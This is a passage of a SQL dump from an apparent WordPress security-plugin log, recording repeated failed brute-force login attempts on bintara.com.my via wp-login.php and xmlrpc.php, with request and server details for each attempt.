09:47:11',18259096,19558232,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.5.43'),(24492,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"58500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCr19K-omY048@iBsNPKAAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568713688.0973\";s:12:\"REQUEST_TIME\";s:10:\"1568713688\";}}','notice','2019-09-17 09:48:09','2019-09-17 09:48:08',17738936,19229528,'https://bintara.com.my/wp-login.php',1,0,'178.128.212.173'),(24493,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"58790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCr2ZS9022wVwVSW96DkwAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568713690.001\";s:12:\"REQUEST_TIME\";s:10:\"1568713690\";}}','notice','2019-09-17 09:48:11','2019-09-17 09:48:10',18258456,19556552,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.212.173'),(24494,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"47894\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCttJS9022wVwVSW96FEgAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714164.9163\";s:12:\"REQUEST_TIME\";s:10:\"1568714164\";}}','notice','2019-09-17 09:56:06','2019-09-17 09:56:05',17740936,19227200,'https://bintara.com.my/wp-login.php',1,0,'132.148.157.66'),(24495,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"47894\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCttJS9022wVwVSW96FEgAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714164.9163\";s:12:\"REQUEST_TIME\";s:10:\"1568714164\";}}','notice','2019-09-17 09:56:06','2019-09-17 09:56:05',17902000,19227200,'https://bintara.com.my/wp-login.php',1,0,'132.148.157.66'),(24496,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"48494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCtt9K-omY048@iBsNQEAAAAMo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714168.0567\";s:12:\"REQUEST_TIME\";s:10:\"1568714168\";}}','notice','2019-09-17 09:56:09','2019-09-17 09:56:08',18259512,19559376,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.157.66'),(24497,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"36676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCu85S9022wVwVSW96F4AAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714483.9276\";s:12:\"REQUEST_TIME\";s:10:\"1568714483\";}}','notice','2019-09-17 10:01:25','2019-09-17 10:01:24',17737512,19227672,'https://bintara.com.my/wp-login.php',1,0,'51.38.128.211'),(24498,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"37224\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCu9pS9022wVwVSW96F4gAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568714486.886\";s:12:\"REQUEST_TIME\";s:10:\"1568714486\";}}','notice','2019-09-17 10:01:29','2019-09-17 10:01:27',18258088,19556896,'https://bintara.com.my/xmlrpc.php',1,0,'51.38.128.211'),(24499,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"39072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCvcdK-omY048@iBsNQigAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714609.8839\";s:12:\"REQUEST_TIME\";s:10:\"1568714609\";}}','notice','2019-09-17 10:03:31','2019-09-17 10:03:30',17742424,19232480,'https://bintara.com.my/wp-login.php',1,0,'166.62.36.222'),(24500,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"40384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCvdJS9022wVwVSW96GWAAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568714612.6559\";s:12:\"REQUEST_TIME\";s:10:\"1568714612\";}}','notice','2019-09-17 10:03:33','2019-09-17 